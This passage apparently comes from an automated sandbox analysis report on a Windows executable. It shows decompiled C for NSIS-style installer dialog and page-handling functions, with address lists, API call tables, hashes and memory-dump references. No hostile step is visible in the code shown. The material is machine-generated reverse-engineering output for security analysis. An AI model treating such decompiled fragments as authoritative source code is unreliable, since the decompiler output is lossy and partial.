							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t230 =  *0x420d34;
								if(_t230 != 0) {
									ImageList_Destroy(_t230);
								}
								_t231 =  *0x420d48;
								if(_t231 != 0) {
									GlobalFree(_t231);
								}
								 *0x420d34 = 0;
								 *0x420d48 = 0;
								 *0x4247c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42475d & 0x00000001) != 0) {
									_t321 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t321);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t321);
								}
								goto L93;
							} else {
								E004011EF(_t298, 0, 0);
								_t203 = _a12;
								if(_t203 != 0) {
									if(_t203 != 0xffffffff) {
										_t203 = _t203 - 1;
									}
									_push(_t203);
									_push(8);
									E00404C7F();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t298, 0, 0);
									_v36 =  *0x420d48;
									_t206 =  *0x424788;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42478c <= 0) {
										L86:
										if( *0x42474c == 4) {
											InvalidateRect(_v8, 0, 1);
										}
										_t207 =  *0x423f1c; // 0x5f57f6
										if( *((intOrPtr*)(_t207 + 0x10)) != 0) {
											E00404BBA(0x3ff, 0xfffffffb, E00404BD2(5));
										}
										goto L90;
									}
									_t322 = _t206 + 8;
									do {
										_t212 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t212 != 0) {
											_t300 =  *_t322;
											_v72 = _t212;
											_v76 = 8;
											if((_t300 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t322[4]);
												_t322[0] = _t322[0] & 0x000000fe;
											}
											if((_t300 & 0x00000040) == 0) {
												_t216 = (_t300 & 0x00000001) + 1;
												if((_t300 & 0x00000010) != 0) {
													_t216 = _t216 + 3;
												}
											} else {
												_t216 = 3;
											}
											_v68 = (_t216 << 0x0000000b | _t300 & 0x00000008) + (_t216 << 0x0000000b | _t300 & 0x00000008) | _t300 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t300 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageA(_v8, 0x110d, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t322 =  &(_t322[0x106]);
									} while (_v24 <  *0x42478c);
									goto L86;
								} else {
									_t323 = E004012E2( *0x420d48);
									E00401299(_t323);
									_t227 = 0;
									_t298 = 0;
									if(_t323 <= 0) {
										L74:
										SendMessageA(_v12, 0x14e, _t298, 0);
										_a16 = _t323;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t227 * 4)) != 0) {
											_t298 = _t298 + 1;
										}
										_t227 = _t227 + 1;
									} while (_t227 < _t323);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t237 = SendMessageA(_v12, 0x147, 0, 0);
							if(_t237 == 0xffffffff) {
								goto L93;
							}
							_t324 = SendMessageA(_v12, 0x150, _t237, 0);
							if(_t324 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t324 * 4)) == 0) {
								_t324 = 0x20;
							}
							E00401299(_t324);
							SendMessageA(_a4, 0x420, 0, _t324);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					 *0x4247c0 = _a4;
					_v20 = 2;
					 *0x420d48 = GlobalAlloc(0x40,  *0x42478c << 2);
					_t264 = LoadImageA( *0x424740, 0x6e, 0, 0, 0, 0);
					 *0x420d3c =  *0x420d3c | 0xffffffff;
					_v16 = _t264;
					 *0x420d44 = SetWindowLongA(_v8, 0xfffffffc, E004052C3);
					_t266 = ImageList_Create(_t320, _t320, 0x21, 6, 0);
					 *0x420d34 = _t266;
					ImageList_AddMasked(_t266, _v16, 0xff00ff);
					SendMessageA(_v8, 0x1109, 2,  *0x420d34);
					if(SendMessageA(_v8, 0x111c, 0, 0) < _t320) {
						SendMessageA(_v8, 0x111b, _t320, 0);
					}
					DeleteObject(_v16);
					_t327 = 0;
					do {
						_t272 =  *((intOrPtr*)(_v28 + _t327 * 4));
						if( *((intOrPtr*)(_v28 + _t327 * 4)) != 0) {
							if(_t327 != 0x20) {
								_v20 = 0;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, 0, E004062BB(0, _t327, _t331, 0, _t272)), _t327);
						}
						_t327 = _t327 + 1;
					} while (_t327 < 0x21);
					_t328 = _a16;
					_push( *((intOrPtr*)(_t328 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004042AC(_a4);
					_push( *((intOrPtr*)(_t328 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004042AC(_a4);
					_t329 = 0;
					_v16 = 0;
					if( *0x42478c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t316 = _v24 + 8;
						_v32 = _t316;
						do {
							_t284 =  &(_t316[0x10]);
							if( *_t284 != 0) {
								_v64 = _t284;
								_t285 =  *_t316;
								_v88 = _v16;
								_t308 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t308;
								_v44 = _t329;
								_v72 = _t285 & _t308;
								if((_t285 & 0x00000002) == 0) {
									if((_t285 & 0x00000004) == 0) {
										 *( *0x420d48 + _t329 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v88);
									} else {
										_v16 = SendMessageA(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t290 = SendMessageA(_v8, 0x1100, 0,  &_v88);
									_v36 = 1;
									 *( *0x420d48 + _t329 * 4) = _t290;
									_v16 =  *( *0x420d48 + _t329 * 4);
								}
							}
							_t329 = _t329 + 1;
							_t316 =  &(_v32[0x418]);
							_v32 = _t316;
						} while (_t329 <  *0x42478c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004042E1(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004042E1(_v12);
								L93:
								return E00404313(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404ccf
0x00404cd7
0x00404cdf
0x00404ce5
0x00404cfd
0x00404d00
0x00404d01
0x00404f2e
0x00404f35
0x00404f49
0x00404f37
0x00404f39
0x00404f3c
0x00404f3d
0x00404f44
0x00404f44
0x00404f55
0x00404f63
0x00404f66
0x00404f7c
0x00404ff1
0x00404ff4
0x00404ff6
0x00405000
0x0040500e
0x0040500e
0x00405010
0x0040501a
0x00405020
0x00405023
0x00405026
0x00405041
0x00405028
0x00405032
0x00405032
0x00405026
0x0040501a
0x00000000
0x00404ff4
0x00404f81
0x00404f8c
0x00404f91
0x00404f98
0x00404f9d
0x00404fa1
0x00404fac
0x00404fac
0x00404fb0
0x00404fb4
0x00404fb8
0x00404fcb
0x00404fba
0x00404fba
0x00404fc1
0x00404fc7
0x00404fc3
0x00404fc3
0x00404fc3
0x00404fc1
0x00404fcf
0x00404fd1
0x00404fe4
0x00404fe7
0x00404fea
0x00404fea
0x00404fb4
0x00000000
0x00404fa1
0x00404f83
0x00404f8a
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405044
0x00405044
0x0040504b
0x004050bc
0x004050c4
0x004050cc
0x004050cc
0x004050d5
0x004050d7
0x004050de
0x004050e1
0x004050e1
0x004050e7
0x004050ee
0x004050f1
0x004050f1
0x004050f7
0x004050fd
0x00405103
0x00405103
0x00405110
0x00405270
0x00405277
0x00405294
0x0040529a
0x004052ac
0x004052ac
0x00000000
0x00405116
0x00405118
0x0040511d
0x00405122
0x00405127
0x00405129
0x00405129
0x0040512a
0x0040512b
0x0040512d
0x0040512d
0x00405135
0x00405176
0x00405178
0x00405188
0x0040518b
0x00405190
0x00405197
0x0040519a
0x0040523c
0x00405244
0x0040524c
0x0040524c
0x00405252
0x0040525a
0x0040526b
0x0040526b
0x00000000
0x0040525a
0x004051a0
0x004051a3
0x004051a9
0x004051ae
0x004051b0
0x004051b2
0x004051b8
0x004051bf
0x004051c4
0x004051cb
0x004051ce
0x004051ce
0x004051d5
0x004051e1
0x004051e5
0x004051e7
0x004051e7
0x004051d7
0x004051d9
0x004051d9
0x00405207
0x00405213
0x00405222
0x00405222
0x00405224
0x00405227
0x00405230
0x00000000
0x00405137
0x00405142
0x00405145
0x0040514a
0x0040514c
0x00405150
0x00405160
0x0040516a
0x0040516c
0x0040516f
0x00000000
0x00000000
0x00000000
0x00000000
0x00405152
0x00405152
0x00405158
0x0040515a
0x0040515a
0x0040515b
0x0040515c
0x00000000
0x00405152
0x00405135
0x00405110
0x00405053
0x00000000
0x00405069
0x00405073
0x00405078
0x00000000
0x00000000
0x0040508a
0x0040508f
0x0040509b
0x0040509b
0x0040509d
0x004050ac
0x004050ae
0x004050b2
0x004050b5
0x00000000
0x004050b5
0x00405053
0x00404d07
0x00404d0a
0x00404d0d
0x00404d1d
0x00404d30
0x00404d3b
0x00404d41
0x00404d4f
0x00404d62
0x00404d67
0x00404d72
0x00404d7b
0x00404d91
0x00404da1
0x00404dad
0x00404dad
0x00404db2
0x00404db8
0x00404dba
0x00404dbd
0x00404dc2
0x00404dc7
0x00404dc9
0x00404dc9
0x00404de9
0x00404de9
0x00404deb
0x00404dec
0x00404df1
0x00404df7
0x00404dfb
0x00404e00
0x00404e08
0x00404e0c
0x00404e11
0x00404e16
0x00404e1e
0x00404e21
0x00404ef0
0x00404f03
0x00000000
0x00404e27
0x00404e2a
0x00404e2d
0x00404e30
0x00404e30
0x00404e35
0x00404e3e
0x00404e41
0x00404e45
0x00404e48
0x00404e4b
0x00404e54
0x00404e5d
0x00404e60
0x00404e63
0x00404e66
0x00404ea4
0x00404ecf
0x00404ea6
0x00404eb5
0x00404eb5
0x00404e68
0x00404e6b
0x00404e79
0x00404e83
0x00404e8b
0x00404e92
0x00404e9d
0x00404e9d
0x00404e66
0x00404ed5
0x00404ed6
0x00404ee2
0x00404ee2
0x00404eee
0x00404f09
0x00404f0c
0x00404f29
0x00000000
0x00404f0e
0x00404f13
0x00404f1c
0x004052ae
0x004052c0
0x004052c0
0x00404f0c
0x00000000
0x00404eee
0x00404e21

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404CC8
GetDlgItem.USER32(?,00000408), ref: 00404CD5
GlobalAlloc.KERNEL32(00000040,?), ref: 00404D24
LoadImageA.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404D3B
SetWindowLongA.USER32 ref: 00404D55
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404D67
ImageList_AddMasked.COMCTL32(00000000,00000110,00FF00FF), ref: 00404D7B
SendMessageA.USER32 ref: 00404D91
SendMessageA.USER32 ref: 00404D9D
SendMessageA.USER32 ref: 00404DAD
DeleteObject.GDI32(00000110), ref: 00404DB2
SendMessageA.USER32 ref: 00404DDD
SendMessageA.USER32 ref: 00404DE9
SendMessageA.USER32 ref: 00404E83
SendMessageA.USER32 ref: 00404EB3

Part of subcall function 004042E1: SendMessageA.USER32 ref: 004042EF

SendMessageA.USER32 ref: 00404EC7
GetWindowLongA.USER32(?,000000F0), ref: 00404EF5
SetWindowLongA.USER32 ref: 00404F03
ShowWindow.USER32(?,00000005), ref: 00404F13
SendMessageA.USER32 ref: 0040500E
SendMessageA.USER32 ref: 00405073
SendMessageA.USER32 ref: 00405088
SendMessageA.USER32 ref: 004050AC
SendMessageA.USER32 ref: 004050CC
ImageList_Destroy.COMCTL32(?), ref: 004050E1
GlobalFree.KERNEL32(?), ref: 004050F1
SendMessageA.USER32 ref: 0040516A
SendMessageA.USER32 ref: 00405213
SendMessageA.USER32 ref: 00405222
InvalidateRect.USER32(?,00000000,00000001), ref: 0040524C
ShowWindow.USER32(?,00000000), ref: 0040529A
GetDlgItem.USER32(?,000003FE), ref: 004052A5
ShowWindow.USER32(00000000), ref: 004052AC

Strings

, xrefs: 00405284
M, xrefs: 00404E6B
N, xrefs: 00404F4C

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 2564846305-813528018
Opcode ID: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
Instruction ID: 1f2220219548b190c7fc9fe52a988bdfc75827026f4451c66edb8ee187498390
Opcode Fuzzy Hash: 2a089ffaa6d080d8f9741abd0f9240871e5015f633a6bdd7d3a40dad24a0061c
Instruction Fuzzy Hash: 33025DB0A00209AFDB20DF94DD45AAE7BB5FB84354F10817AF610BA2E1C7789D52DF58

Uniqueness

Uniqueness Score: -1.00%

Function 00403DD8, Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00403DD8(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t68;
				struct HWND__* _t74;
				signed int _t87;
				struct HWND__* _t92;
				signed int _t100;
				int _t104;
				signed int _t116;
				signed int _t117;
				int _t118;
				signed int _t123;
				struct HWND__* _t126;
				struct HWND__* _t127;
				int _t128;
				long _t131;
				int _t133;
				int _t134;
				void* _t135;
				void* _t143;

				_t116 = _a8;
				if(_t116 == 0x110 || _t116 == 0x408) {
					_t35 = _a12;
					_t126 = _a4;
					__eflags = _t116 - 0x110;
					 *0x420d38 = _t35;
					if(_t116 == 0x110) {
						 *0x424748 = _t126;
						 *0x420d4c = GetDlgItem(_t126, 1);
						_t92 = GetDlgItem(_t126, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41fd18 = _t92;
						E004042AC(_t126);
						SetClassLongA(_t126, 0xfffffff2,  *0x423f28);
						 *0x423f0c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x420d38 = 1;
					}
					_t123 =  *0x40a1f8; // 0xffffffff
					_t134 = 0;
					_t131 = (_t123 << 6) +  *0x424780;
					__eflags = _t123;
					if(_t123 < 0) {
						L34:
						E004042F8(0x40b);
						while(1) {
							_t37 =  *0x420d38;
							 *0x40a1f8 =  *0x40a1f8 + _t37;
							_t131 = _t131 + (_t37 << 6);
							_t39 =  *0x40a1f8; // 0xffffffff
							__eflags = _t39 -  *0x424784;
							if(_t39 ==  *0x424784) {
								E0040140B(1);
							}
							__eflags =  *0x423f0c - _t134; // 0x0
							if(__eflags != 0) {
								break;
							}
							__eflags =  *0x40a1f8 -  *0x424784; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t117 =  *(_t131 + 0x14);
							E004062BB(_t117, _t126, _t131, 0x42c800,  *((intOrPtr*)(_t131 + 0x24)));
							_push( *((intOrPtr*)(_t131 + 0x20)));
							_push(0xfffffc19);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x1c)));
							_push(0xfffffc1b);
							E004042AC(_t126);
							_push( *((intOrPtr*)(_t131 + 0x28)));
							_push(0xfffffc1a);
							E004042AC(_t126);
							_t49 = GetDlgItem(_t126, 3);
							__eflags =  *0x4247ec - _t134;
							_v32 = _t49;
							if( *0x4247ec != _t134) {
								_t117 = _t117 & 0x0000fefd | 0x00000004;
								__eflags = _t117;
							}
							ShowWindow(_t49, _t117 & 0x00000008);
							EnableWindow( *(_t135 + 0x30), _t117 & 0x00000100);
							E004042CE(_t117 & 0x00000002);
							_t118 = _t117 & 0x00000004;
							EnableWindow( *0x41fd18, _t118);
							__eflags = _t118 - _t134;
							if(_t118 == _t134) {
								_push(1);
							} else {
								_push(_t134);
							}
							EnableMenuItem(GetSystemMenu(_t126, _t134), 0xf060, ??);
							SendMessageA( *(_t135 + 0x38), 0xf4, _t134, 1);
							__eflags =  *0x4247ec - _t134;
							if( *0x4247ec == _t134) {
								_push( *0x420d4c);
							} else {
								SendMessageA(_t126, 0x401, 2, _t134);
								_push( *0x41fd18);
							}
							E004042E1();
							E00406228(0x420d50, E00403DB9());
							E004062BB(0x420d50, _t126, _t131,  &(0x420d50[lstrlenA(0x420d50)]),  *((intOrPtr*)(_t131 + 0x18)));
							SetWindowTextA(_t126, 0x420d50);
							_t68 = E00401389( *((intOrPtr*)(_t131 + 8)), _t134);
							__eflags = _t68;
							if(_t68 != 0) {
								continue;
							} else {
								__eflags =  *_t131 - _t134;
								if( *_t131 == _t134) {
									continue;
								}
								__eflags =  *(_t131 + 4) - 5;
								if( *(_t131 + 4) != 5) {
									DestroyWindow( *0x423f18);
									 *0x420528 = _t131;
									__eflags =  *_t131 - _t134;
									if( *_t131 <= _t134) {
										goto L58;
									}
									_t74 = CreateDialogParamA( *0x424740,  *_t131 +  *0x423f20 & 0x0000ffff, _t126,  *(0x40a1fc +  *(_t131 + 4) * 4), _t131);
									__eflags = _t74 - _t134;
									 *0x423f18 = _t74;
									if(_t74 == _t134) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t131 + 0x2c)));
									_push(6);
									E004042AC(_t74);
									GetWindowRect(GetDlgItem(_t126, 0x3fa), _t135 + 0x10);
									ScreenToClient(_t126, _t135 + 0x10);
									SetWindowPos( *0x423f18, _t134,  *(_t135 + 0x20),  *(_t135 + 0x20), _t134, _t134, 0x15);
									E00401389( *((intOrPtr*)(_t131 + 0xc)), _t134);
									__eflags =  *0x423f0c - _t134; // 0x0
									if(__eflags != 0) {
										goto L61;
									}
									ShowWindow( *0x423f18, 8);
									E004042F8(0x405);
									goto L58;
								}
								__eflags =  *0x4247ec - _t134;
								if( *0x4247ec != _t134) {
									goto L61;
								}
								__eflags =  *0x4247e0 - _t134;
								if( *0x4247e0 != _t134) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x423f18);
						 *0x424748 = _t134;
						EndDialog(_t126,  *0x420120);
						goto L58;
					} else {
						__eflags = _t35 - 1;
						if(_t35 != 1) {
							L33:
							__eflags =  *_t131 - _t134;
							if( *_t131 == _t134) {
								goto L61;
							}
							goto L34;
						}
						_t87 = E00401389( *((intOrPtr*)(_t131 + 0x10)), 0);
						__eflags = _t87;
						if(_t87 == 0) {
							goto L33;
						}
						SendMessageA( *0x423f18, 0x40f, 0, 1);
						__eflags =  *0x423f0c - _t134; // 0x0
						return 0 | __eflags == 0x00000000;
					}
				} else {
					_t126 = _a4;
					_t134 = 0;
					if(_t116 == 0x47) {
						SetWindowPos( *0x420d30, _t126, 0, 0, 0, 0, 0x13);
					}
					if(_t116 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x420d30,  ~(_a12 - 1) & _t116);
					}
					if(_t116 != 0x40d) {
						__eflags = _t116 - 0x11;
						if(_t116 != 0x11) {
							__eflags = _t116 - 0x111;
							if(_t116 != 0x111) {
								L26:
								return E00404313(_t116, _a12, _a16);
							}
							_t133 = _a12 & 0x0000ffff;
							_t127 = GetDlgItem(_t126, _t133);
							__eflags = _t127 - _t134;
							if(_t127 == _t134) {
								L13:
								__eflags = _t133 - 1;
								if(_t133 != 1) {
									__eflags = _t133 - 3;
									if(_t133 != 3) {
										_t128 = 2;
										__eflags = _t133 - _t128;
										if(_t133 != _t128) {
											L25:
											SendMessageA( *0x423f18, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x4247ec - _t134;
										if( *0x4247ec == _t134) {
											_t100 = E0040140B(3);
											__eflags = _t100;
											if(_t100 != 0) {
												goto L26;
											}
											 *0x420120 = 1;
											L21:
											_push(0x78);
											L22:
											E00404285();
											goto L26;
										}
										E0040140B(_t128);
										 *0x420120 = _t128;
										goto L21;
									}
									__eflags =  *0x40a1f8 - _t134; // 0xffffffff
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t133);
								goto L22;
							}
							SendMessageA(_t127, 0xf3, _t134, _t134);
							_t104 = IsWindowEnabled(_t127);
							__eflags = _t104;
							if(_t104 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongA(_t126, _t134, _t134);
						return 1;
					} else {
						DestroyWindow( *0x423f18);
						 *0x423f18 = _a12;
						L58:
						if( *0x421d50 == _t134) {
							_t143 =  *0x423f18 - _t134; // 0x0
							if(_t143 != 0) {
								ShowWindow(_t126, 0xa);
								 *0x421d50 = 1;
							}
						}
						L61:
						return 0;
					}
				}
			}

0x00403de1
0x00403dea
0x00403f2b
0x00403f2f
0x00403f33
0x00403f35
0x00403f3a
0x00403f45
0x00403f50
0x00403f55
0x00403f57
0x00403f59
0x00403f5c
0x00403f61
0x00403f6f
0x00403f7c
0x00403f83
0x00403f83
0x00403f84
0x00403f84
0x00403f89
0x00403f8f
0x00403f96
0x00403f9c
0x00403f9e
0x00403fde
0x00403fe3
0x00403fe8
0x00403fe8
0x00403fed
0x00403ff6
0x00403ff8
0x00403ffd
0x00404003
0x00404007
0x00404007
0x0040400c
0x00404012
0x00000000
0x00000000
0x0040401d
0x00404023
0x00000000
0x00000000
0x0040402c
0x00404034
0x00404039
0x0040403c
0x00404042
0x00404047
0x0040404a
0x00404050
0x00404055
0x00404058
0x0040405e
0x00404066
0x0040406c
0x00404072
0x00404076
0x0040407d
0x0040407d
0x0040407d
0x00404087
0x00404099
0x004040a5
0x004040aa
0x004040b4
0x004040ba
0x004040bc
0x004040c1
0x004040be
0x004040be
0x004040be
0x004040d1
0x004040e9
0x004040eb
0x004040f1
0x00404106
0x004040f3
0x004040fc
0x004040fe
0x004040fe
0x0040410c
0x0040411d
0x0040412e
0x00404135
0x0040413f
0x00404144
0x00404146
0x00000000
0x0040414c
0x0040414c
0x0040414e
0x00000000
0x00000000
0x00404154
0x00404158
0x0040417d
0x00404183
0x00404189
0x0040418b
0x00000000
0x00000000
0x004041b1
0x004041b7
0x004041b9
0x004041be
0x00000000
0x00000000
0x004041c4
0x004041c7
0x004041ca
0x004041e1
0x004041ed
0x00404206
0x00404210
0x00404215
0x0040421b
0x00000000
0x00000000
0x00404225
0x00404230
0x00000000
0x00404230
0x0040415a
0x00404160
0x00000000
0x00000000
0x00404166
0x0040416c
0x00000000
0x00000000
0x00000000
0x00404172
0x00404146
0x0040423d
0x00404249
0x00404250
0x00000000
0x00403fa0
0x00403fa0
0x00403fa3
0x00403fd6
0x00403fd6
0x00403fd8
0x00000000
0x00000000
0x00000000
0x00403fd8
0x00403fa9
0x00403fae
0x00403fb0
0x00000000
0x00000000
0x00403fc0
0x00403fc8
0x00000000
0x00403fce
0x00403dfc
0x00403dfc
0x00403e00
0x00403e05
0x00403e14
0x00403e14
0x00403e1d
0x00403e26
0x00403e31
0x00403e31
0x00403e3d
0x00403e59
0x00403e5c
0x00403e6f
0x00403e75
0x00403f18
0x00000000
0x00403f21
0x00403e7b
0x00403e88
0x00403e8a
0x00403e8c
0x00403eab
0x00403eab
0x00403eae
0x00403eb3
0x00403eb6
0x00403ec6
0x00403ec7
0x00403ec9
0x00403eff
0x00403f12
0x00000000
0x00403f12
0x00403ecb
0x00403ed1
0x00403eea
0x00403eef
0x00403ef1
0x00000000
0x00000000
0x00403ef3
0x00403edf
0x00403edf
0x00403ee1
0x00403ee1
0x00000000
0x00403ee1
0x00403ed4
0x00403ed9
0x00000000
0x00403ed9
0x00403eb8
0x00403ebe
0x00000000
0x00000000
0x00403ec0
0x00000000
0x00403ec0
0x00403eb0
0x00000000
0x00403eb0
0x00403e96
0x00403e9d
0x00403ea3
0x00403ea5
0x00000000
0x00000000
0x00000000
0x00403ea5
0x00403e61
0x00000000
0x00403e3f
0x00403e45
0x00403e4f
0x00404256
0x0040425c
0x0040425e
0x00404264
0x00404269
0x0040426f
0x0040426f
0x00404264
0x00404279
0x00000000
0x00404279
0x00403e3d

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403E14
ShowWindow.USER32(?), ref: 00403E31
DestroyWindow.USER32 ref: 00403E45
SetWindowLongA.USER32 ref: 00403E61
GetDlgItem.USER32(?,?), ref: 00403E82
SendMessageA.USER32 ref: 00403E96
IsWindowEnabled.USER32(00000000), ref: 00403E9D
GetDlgItem.USER32(?,00000001), ref: 00403F4B
GetDlgItem.USER32(?,00000002), ref: 00403F55
SetClassLongA.USER32(?,000000F2,?), ref: 00403F6F
SendMessageA.USER32 ref: 00403FC0
GetDlgItem.USER32(?,00000003), ref: 00404066
ShowWindow.USER32(00000000,?), ref: 00404087
EnableWindow.USER32(?,?), ref: 00404099
EnableWindow.USER32(?,?), ref: 004040B4
GetSystemMenu.USER32 ref: 004040CA
EnableMenuItem.USER32 ref: 004040D1
SendMessageA.USER32 ref: 004040E9
SendMessageA.USER32 ref: 004040FC
lstrlenA.KERNEL32(00420D50,?,00420D50,00000000), ref: 00404126
SetWindowTextA.USER32(?,00420D50), ref: 00404135
ShowWindow.USER32(?,0000000A), ref: 00404269

Strings

PB, xrefs: 00404116

Memory Dump Source

Source File: 00000004.00000002.2162165102.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2162154870.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162181596.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2162200762.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162217509.0000000000413000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162228489.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162238122.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2162252001.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: PB
API String ID: 184305955-3196168531
Opcode ID: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
Instruction ID: 6f64ab7c90c2728ca861f65b52108cf4a96aadf8bbc29eaef7369c8c365bd3a4
Opcode Fuzzy Hash: 7ca70d26d5cdbf7e385cb3433e5eec3c9b526a6c029d08fd08a86bcbe3389ad2
Instruction Fuzzy Hash: F2C1C2B1A00300BFDB216F61EE45D2B3AB8EB85746F41053EF641B51F1CB3999829B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00403A3B, Relevance: 49.2, APIs: 13, Strings: 15, Instructions: 215
stringregistryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00403A3B(void* __eflags) {
				intOrPtr _v4;
				intOrPtr _v8;
				int _v12;
				void _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t17;
				void* _t25;
				void* _t27;
				int _t28;
				void* _t31;
				int _t34;
				int _t35;
				intOrPtr _t36;
				int _t39;
				char _t57;
				CHAR* _t59;
				signed char _t63;
				CHAR* _t74;
				intOrPtr _t76;
				CHAR* _t81;

				_t76 =  *0x424754;
				_t17 = E00406631(2);
				_t84 = _t17;
				if(_t17 == 0) {
					_t74 = 0x420d50;
					"1033" = 0x30;
					 *0x42b001 = 0x78;
					 *0x42b002 = 0;
					E0040610F(_t71, __eflags, 0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x420d50, 0);
					__eflags =  *0x420d50;
					if(__eflags == 0) {
						E0040610F(_t71, __eflags, 0x80000003, ".DEFAULT\\Control Panel\\International",  &M0040836A, 0x420d50, 0);
					}
					lstrcatA("1033", _t74);
				} else {
					E00406186("1033",  *_t17() & 0x0000ffff);
				}
				E00403D00(_t71, _t84);
				_t80 = "C:\\Users\\Albus\\AppData\\Local\\Temp";
				 *0x4247e0 =  *0x42475c & 0x00000020;
				 *0x4247fc = 0x10000;
				if(E00405CAE(_t84, "C:\\Users\\Albus\\AppData\\Local\\Temp") != 0) {
					L16:
					if(E00405CAE(_t92, _t80) == 0) {
						E004062BB(0, _t74, _t76, _t80,  *((intOrPtr*)(_t76 + 0x118)));
					}
					_t25 = LoadImageA( *0x424740, 0x67, 1, 0, 0, 0x8040);
					 *0x423f28 = _t25;
					if( *((intOrPtr*)(_t76 + 0x50)) == 0xffffffff) {
						L21:
						if(E0040140B(0) == 0) {
							_t27 = E00403D00(_t71, __eflags);
							__eflags =  *0x424800;
							if( *0x424800 != 0) {
								_t28 = E00405421(_t27, 0);
								__eflags = _t28;
								if(_t28 == 0) {
									E0040140B(1);
									goto L33;
								}
								__eflags =  *0x423f0c; // 0x0
								if(__eflags == 0) {
									E0040140B(2);
								}
								goto L22;
							}
							ShowWindow( *0x420d30, 5);
							_t34 = E004065C3("RichEd20");
							__eflags = _t34;
							if(_t34 == 0) {
								E004065C3("RichEd32");
							}
							_t81 = "RichEdit20A";
							_t35 = GetClassInfoA(0, _t81, 0x423ee0);
							__eflags = _t35;
							if(_t35 == 0) {
